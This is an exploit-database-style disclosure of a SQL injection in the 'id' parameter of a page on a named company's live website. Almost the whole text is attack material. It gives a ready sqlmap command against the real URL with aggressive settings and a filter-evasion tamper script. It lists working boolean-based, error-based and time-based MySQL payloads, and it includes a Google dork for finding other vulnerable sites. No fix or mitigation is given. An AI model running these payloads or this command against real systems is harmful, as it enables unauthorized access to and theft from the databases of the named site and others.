**************************** #Exploit Title: proficientindustries - SQL Injection vulnerability #Date: 2024-06-20 #Exploit Author: Mahdi Karimi #Vendor Homepage: http://www.proficientindustries.in #Google Dork: "Powered by proficientindustries" #Tested On: Kali Linux sqlmap: sqlmap -u "http://www.proficientindustries.in/view-single-news.php?id=1" -p id --level=5 --risk=3 --tamper=space2comment --random-agent Testing Method; - boolean-based blind - error-based - time-based blind Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 7399=7399 Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: id=1 AND GTID_SUBSET(CONCAT(0x7178786a71,(SELECT (ELT(6724=6724,1))),0x717a6a7171),6724) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 5364 FROM (SELECT(SLEEP(5)))boFC) --- ************************************************** #Discovered by: Mahdi Karimi #Email : [email protected] **************************************************